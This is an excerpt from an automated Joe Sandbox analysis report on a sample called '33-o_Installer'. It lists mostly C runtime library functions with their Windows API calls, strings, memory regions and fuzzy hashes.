Opcode Fuzzy Hash: 72dc3392c568ef416c44465970db70ba6570beb281da2af7f872be6eb1690ea1
Instruction Fuzzy Hash: A9018F714093449AE710CE29DDC4BA7BFA8EF41364F1CC45AEE484AA46C27D9845CAB1

Non-executed Functions

Function 00DCF4CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00DCFB0A,?,00DC6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00DCF50C
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00DCFB0A,?,00DC6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00DCF535
GetACP.KERNEL32(?,?,00DCFB0A,?,00DC6AFC,?,000000BC,?,00000001,00000000), ref: 00DCF549

Strings

OCP, xrefs: 00DCF4ED
ACP, xrefs: 00DCF4DC

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f3916ac2f39d770c78f695ba5d952997bf742e647bd4f413b72f8287d5250c29
Instruction ID: b9f194c9fb5d99c240f469ffdbd2c4d0c745890342ce385770a92ed56a2234f2
Opcode Fuzzy Hash: f3916ac2f39d770c78f695ba5d952997bf742e647bd4f413b72f8287d5250c29
Instruction Fuzzy Hash: 4901B131601307BAEB119F60EC06F9E77AAAB01359F24442AE201E21C0DB60DA419674

Function 00DC65D1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00DCE003
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DCE018
UnhandledExceptionFilter.KERNEL32(00DDAEF0), ref: 00DCE023
GetCurrentProcess.KERNEL32(C0000409), ref: 00DCE03F
TerminateProcess.KERNEL32(00000000), ref: 00DCE046

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8b26f3516938a483f985cfc5c978c1ce543af6583faced1d821d81579c418d73
Instruction ID: edf1ba75f8305789f4495681b63a8d5ce6674e7854113c191bd054de3e4f598e
Opcode Fuzzy Hash: 8b26f3516938a483f985cfc5c978c1ce543af6583faced1d821d81579c418d73
Instruction Fuzzy Hash: 3921BCB8A023849FC700EF99ECD5A987BF4FB48744F50405AE509CBBA0E7B159808F35

Function 058307A0 Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

Xaq, xrefs: 058307CF
$]q, xrefs: 058307B6

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: ea6ce4924d2b4604d877a151d2372361d27de1525d51e32d0ce859977574b1e6
Instruction ID: 8995cddad947a1c26b8c3db8b51119e0e8a3d80de937f3691fa478dc343ff032
Opcode Fuzzy Hash: ea6ce4924d2b4604d877a151d2372361d27de1525d51e32d0ce859977574b1e6
Instruction Fuzzy Hash: BC815E74B05218DBDB08EF79986967E7BB7BBC8710B04C429E44BE7384DE389C029791

Function 00DCC78D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 00DCC792

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ea191670ea6559c4af7a955370d7b6f281fcde8502b48fea0206ad9e2cc9834f
Instruction ID: c14af3185c7015f795ab76e0d5c259fb9ad678ca4385ecaa9044493f990b82fb
Opcode Fuzzy Hash: ea191670ea6559c4af7a955370d7b6f281fcde8502b48fea0206ad9e2cc9834f
Instruction Fuzzy Hash: 8D9002F02626014A470157746D1AE1577919A586067421455B205C5194DB9155045D72

Function 058349C0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vl, xrefs: 05834C0B

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID: \Vl
API String ID: 0-682378881
Opcode ID: 22e08ce928f8ff31685d151780e7433782d826cfe9542fed3293592a2892dd0d
Instruction ID: b3c2035989d2b026db53807edd7cde78a338f9f799c868182acfcb4dd5e464a9
Opcode Fuzzy Hash: 22e08ce928f8ff31685d151780e7433782d826cfe9542fed3293592a2892dd0d
Instruction Fuzzy Hash: 87914E70E04209DFDF14CFA9C98A79DBBF2BF88314F148529D815E7264EB749846CB85

Function 00DD0BD6 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: ae83d06cb1769334372a119ab4cd26fe35fc509fd896027b9c698f5fbd264d6a
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 6AC17C73D1A5F2498B36462E041833EEE626EC1B8572FC396DCD43F689C227AD0596E0

Function 00DD07EE Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: a52f954abf46b94ee5c4f682eb050a026e16ff681f84c346544f95b800650901
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 6EC16C73D0A5F2498B36462D441873BEEA26ED1B8471FC396DCD43F299C227AD0596E0

Function 00DD041C Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 5fd386dc11ac83dfff7ce517159442fb712d77d9bcecfbdcb2cfceb85337ad89
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 96C16E73D0A5F24A8B36452D041873FEE616EC1B8471F83A6DCD43F789C627AD1596E0

Function 00DD007E Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 25626b3fcd7ce29bf9ee285331647446c58569704ca857cadca67549cc7bdc3f
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 57B19E33D0A5F24A8B36852E041873FEE626ED1B8471EC396CCD43F789C227AD0596E0

Function 03371628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: 1766451990c754ea29cbd3cc4d598b7b92dda13a1c3153b1330bcc05252111da
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: 14F06D32610204AFDF25CF48CC81EAA77EDEF08220B0840A9FD09DB221E335FD209B80

Function 00DC1671 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644

Function 00DC98E5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00DC5A5E), ref: 00DC98ED
__mtterm.LIBCMT ref: 00DC98F9

Part of subcall function 00DC9632: DecodePointer.KERNEL32(00000002,00DC9A5B,?,00DC5A5E), ref: 00DC9643
Part of subcall function 00DC9632: TlsFree.KERNEL32(00000002,00DC9A5B,?,00DC5A5E), ref: 00DC965D
Part of subcall function 00DC9632: DeleteCriticalSection.KERNEL32(00000000,00000000,76EE5810,?,00DC9A5B,?,00DC5A5E), ref: 00DCB6A4
Part of subcall function 00DC9632: _free.LIBCMT ref: 00DCB6A7
Part of subcall function 00DC9632: DeleteCriticalSection.KERNEL32(00000002,76EE5810,?,00DC9A5B,?,00DC5A5E), ref: 00DCB6CE

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DC990F
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DC991C
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DC9929
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DC9936
TlsAlloc.KERNEL32(?,00DC5A5E), ref: 00DC9986
TlsSetValue.KERNEL32(00000000,?,00DC5A5E), ref: 00DC99A1
__init_pointers.LIBCMT ref: 00DC99AB
EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99BC
EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99C9
EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99D6
EncodePointer.KERNEL32(?,00DC5A5E), ref: 00DC99E3
DecodePointer.KERNEL32(00DC97B6,?,00DC5A5E), ref: 00DC9A04
__calloc_crt.LIBCMT ref: 00DC9A19
DecodePointer.KERNEL32(00000000,?,00DC5A5E), ref: 00DC9A33
GetCurrentThreadId.KERNEL32 ref: 00DC9A45

Strings

FlsFree, xrefs: 00DC992B
KERNEL32.DLL, xrefs: 00DC98E8
FlsAlloc, xrefs: 00DC9909
FlsGetValue, xrefs: 00DC9911
FlsSetValue, xrefs: 00DC991E

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 3367df96e6653f9868146943807f7569567a749666d97e193a8bf39901cfc656
Instruction ID: 5e2d4d04250bc1595002d8b4960bb9982ecdd567f434721dfdd6b64c84078e00
Opcode Fuzzy Hash: 3367df96e6653f9868146943807f7569567a749666d97e193a8bf39901cfc656
Instruction Fuzzy Hash: DA3151319423929ED720AF75AC59B6DBFE4E744360B0C451BE514DB3B2DBB58881CE70

Function 00DC235F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC2364
std::_Lockit::_Lockit.LIBCPMT ref: 00DC2373
int.LIBCPMT ref: 00DC238A

Part of subcall function 00DC1035: std::_Lockit::_Lockit.LIBCPMT ref: 00DC1046

std::bad_exception::bad_exception.LIBCMT ref: 00DC23C1
__CxxThrowException@8.LIBCMT ref: 00DC23CF
std::locale::facet::_Incref.LIBCPMT ref: 00DC23DF
std::locale::facet::_Facet_Register.LIBCPMT ref: 00DC23E5

Strings

bad cast, xrefs: 00DC23B9

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 878426289-3145022300
Opcode ID: d1170b606a05de839b743fe8938b3eebdf59fc74b741de793f198c103bcbff02
Instruction ID: d3ebaca1bdedbdc48e864126936932b8f0615d04c6fe360839a74fb6c1f7a5ae
Opcode Fuzzy Hash: d1170b606a05de839b743fe8938b3eebdf59fc74b741de793f198c103bcbff02
Instruction Fuzzy Hash: 3B115A36900266ABCB05FBA4CC92FAEB735EB81720F64011EF411A72D1DF749A45CBB0

Function 00DC1E2E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC1E33
std::_Lockit::_Lockit.LIBCPMT ref: 00DC1E42
int.LIBCPMT ref: 00DC1E59

Part of subcall function 00DC1035: std::_Lockit::_Lockit.LIBCPMT ref: 00DC1046

std::bad_exception::bad_exception.LIBCMT ref: 00DC1E90
__CxxThrowException@8.LIBCMT ref: 00DC1E9E
std::locale::facet::_Incref.LIBCPMT ref: 00DC1EAE
std::locale::facet::_Facet_Register.LIBCPMT ref: 00DC1EB4

Strings

bad cast, xrefs: 00DC1E88

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 878426289-3145022300
Opcode ID: e9834e1309f3e8bd50e8f359d67aa5b22eef0a461544a0d8b0ac24d74d97092a
Instruction ID: 074e634e7d5d555567c53836327b3ee0cc0e4a0add0ec33356c12a6dbd57ae41
Opcode Fuzzy Hash: e9834e1309f3e8bd50e8f359d67aa5b22eef0a461544a0d8b0ac24d74d97092a
Instruction Fuzzy Hash: A11177769002669BCF05FB64C952FAEB735EB91720F14421DF411A72D2DF749A05CB70

Function 00DC7413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00DC741A

Part of subcall function 00DC9723: GetLastError.KERNEL32(?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9727
Part of subcall function 00DC9723: ___set_flsgetvalue.LIBCMT ref: 00DC9735
Part of subcall function 00DC9723: __calloc_crt.LIBCMT ref: 00DC9749
Part of subcall function 00DC9723: DecodePointer.KERNEL32(00000000,?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9763
Part of subcall function 00DC9723: GetCurrentThreadId.KERNEL32 ref: 00DC9779
Part of subcall function 00DC9723: SetLastError.KERNEL32(00000000,?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9791

__calloc_crt.LIBCMT ref: 00DC743C
__get_sys_err_msg.LIBCMT ref: 00DC745A
_strcpy_s.LIBCMT ref: 00DC7462
__invoke_watson.LIBCMT ref: 00DC7477

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00DC7427, 00DC744A

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 19ed468da0a390d6258f8ecefc4a5a65ba0caad2bf180f650c5ea3f365b6c153
Instruction ID: 628bc331d46143a191e749dc42b0451032d3c6d59c2655491236a7008696fd32
Opcode Fuzzy Hash: 19ed468da0a390d6258f8ecefc4a5a65ba0caad2bf180f650c5ea3f365b6c153
Instruction Fuzzy Hash: 20F09E7260C21327D7253A3E9C81F6BBA9CCF40B28B18047FF659D7602E921DC009AB5

Function 00DC1A81 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC1A86
std::_Lockit::_Lockit.LIBCPMT ref: 00DC1A98
std::exception::exception.LIBCMT ref: 00DC1ACF

Part of subcall function 00DC3C86: std::exception::_Copy_str.LIBCMT ref: 00DC3CA1

__CxxThrowException@8.LIBCMT ref: 00DC1AE4

Part of subcall function 00DC450C: RaiseException.KERNEL32(?,?,00DC13AC,?,?,?,?,?,00DC13AC,?,00DDCCE8,00000000), ref: 00DC454E

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DC1AED

Strings

bad locale name, xrefs: 00DC1AC8

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 446407826-1405518554
Opcode ID: e7245f62602ed3904dfe9d56c7f5fd72ed29efcc02cf83bc3638557aa8c572e3
Instruction ID: e6ecf9bc53089d7f161c76037c811eb0a3584a1a72db26d7842d57699be72eac
Opcode Fuzzy Hash: e7245f62602ed3904dfe9d56c7f5fd72ed29efcc02cf83bc3638557aa8c572e3
Instruction Fuzzy Hash: EE015BB6801745AECB21EF99C4809CEFFB4FB19300B40852FE55993601C7709708CBB5

Function 00DC966F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00DDD638,00000008,00DC9777,00000000,00000000,?,?,00DCA964,00DC4478,?,?,00DC3C7B,?,?,00DC101C), ref: 00DC9680
__lock.LIBCMT ref: 00DC96B4

Part of subcall function 00DCB7B7: __mtinitlocknum.LIBCMT ref: 00DCB7CD
Part of subcall function 00DCB7B7: __amsg_exit.LIBCMT ref: 00DCB7D9
Part of subcall function 00DCB7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,00DC96B9,0000000D), ref: 00DCB7E1

InterlockedIncrement.KERNEL32(?), ref: 00DC96C1
__lock.LIBCMT ref: 00DC96D5
___addlocaleref.LIBCMT ref: 00DC96F3

Strings

KERNEL32.DLL, xrefs: 00DC967B

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 7677829fa202dc726997b94ac1090f3bd272ce568fd6ac0cf0278084b70df61f
Instruction ID: 7d05706f781b3600a40de60f2b5ebfd1696b52774c4143a10b21a527f2571b44
Opcode Fuzzy Hash: 7677829fa202dc726997b94ac1090f3bd272ce568fd6ac0cf0278084b70df61f
Instruction Fuzzy Hash: A5015E71441B059FD7209F69D846B49FBE0EF50324F10850EE89A973E1CBB4A544CF35

Function 00DC76D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00DC76F1

Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC

__getptd.LIBCMT ref: 00DC7702
__getptd.LIBCMT ref: 00DC7710

Strings

RCC, xrefs: 00DC76DC
csm, xrefs: 00DC76EA
MOC, xrefs: 00DC76E3

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction ID: 5d0dfbe1fb17fd3a45b3bf8c3502725c0243ae23c2ebdd8c13cfa907a6531dd3
Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction Fuzzy Hash: C5E01A3511810A8FCF20AB78C04AFA87394EB48315F5E54A9E40DCB2B2C738E8518AB2

Function 00DC7993 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 00DC79BB

Part of subcall function 00DC4842: __getptd.LIBCMT ref: 00DC4850
Part of subcall function 00DC4842: __getptd.LIBCMT ref: 00DC485E

__getptd.LIBCMT ref: 00DC79C5

